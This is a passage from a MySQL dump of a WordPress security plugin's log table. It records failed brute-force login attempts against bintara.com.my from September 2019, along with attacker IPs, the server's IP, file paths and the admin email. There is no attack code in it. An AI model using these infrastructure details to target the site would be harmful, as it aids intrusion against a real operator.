10:37:19',17739728,19230744,'https://bintara.com.my/wp-login.php',1,0,'153.126.195.38'),(24068,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"33836\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9lG2f5CPZPc3WLyou8HQAAAM0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630044.1567\";s:12:\"REQUEST_TIME\";s:10:\"1568630044\";}}','notice','2019-09-16 10:34:05','2019-09-16 10:34:04',18256048,19555376,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.158.153'),(24067,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.158.153\";s:11:\"REMOTE_PORT\";s:5:\"32786\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9lE2f5CPZPc3WLyou8FgAAAMY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568630035.9063\";s:12:\"REQUEST_TIME\";s:10:\"1568630035\";}}','notice','2019-09-16 10:33:57','2019-09-16 10:33:56',17739648,19232344,'https://bintara.com.my/wp-login.php',1,0,'188.166.158.153'),(24066,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.227.92.60\";s:11:\"REMOTE_PORT\";s:5:\"39238\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9kL2f5CPZPc3WLyou7kQAAANU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568629807.1131\";s:12:\"REQUEST_TIME\";s:10:\"1568629807\";}}','notice','2019-09-16 10:30:08','2019-09-16 10:30:07',18253648,19551944,'https://bintara.com.my/xmlrpc.php',1,0,'165.227.92.60'),(24065,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"165.227.92.60\";s:11:\"REMOTE_PORT\";s:5:\"38370\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9kKmf5CPZPc3WLyou7jwAAANI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568629802.9551\";s:12:\"REQUEST_TIME\";s:10:\"1568629802\";}}','notice','2019-09-16 10:30:04','2019-09-16 10:30:03',17741256,19232416,'https://bintara.com.my/wp-login.php',1,0,'165.227.92.60'),(24064,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"45184\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9iC71rBLb0GV3O7mTc@AAAAE0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568629259.6836\";s:12:\"REQUEST_TIME\";s:10:\"1568629259\";}}','notice','2019-09-16 10:21:01','2019-09-16 10:21:00',18256984,19556928,'https://bintara.com.my/xmlrpc.php',1,0,'23.83.230.2'),(24063,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.83.230.2\";s:11:\"REMOTE_PORT\";s:5:\"44710\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9iCGf5CPZPc3WLyou6RQAAAMw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568629256.7293\";s:12:\"REQUEST_TIME\";s:10:\"1568629256\";}}','notice','2019-09-16 10:20:58','2019-09-16 10:20:57',17739576,19230720,'https://bintara.com.my/wp-login.php',1,0,'23.83.230.2');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (24062,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.6.175\";s:11:\"REMOTE_PORT\";s:5:\"57654\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9hQWf5CPZPc3WLyou54AAAAMw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568629057.9586\";s:12:\"REQUEST_TIME\";s:10:\"1568629057\";}}','notice','2019-09-16 10:17:39','2019-09-16 10:17:38',18257176,19556864,'https://bintara.com.my/xmlrpc.php',1,0,'142.4.6.175'),(24061,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.6.175\";s:11:\"REMOTE_PORT\";s:5:\"56096\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9hNWf5CPZPc3WLyou53QAAAMI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568629045.9585\";s:12:\"REQUEST_TIME\";s:10:\"1568629045\";}}','notice','2019-09-16 10:17:27','2019-09-16 10:17:26',17739664,19231168,'https://bintara.com.my/wp-login.php',1,0,'142.4.6.175'),(24060,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"55602\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX9fV2f5CPZPc3WLyou5BAAAAME\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568628568.031\";s:12:\"REQUEST_TIME\";s:10:\"1568628568\";}}','notice','2019-09-16 10:09:29','2019-09-16 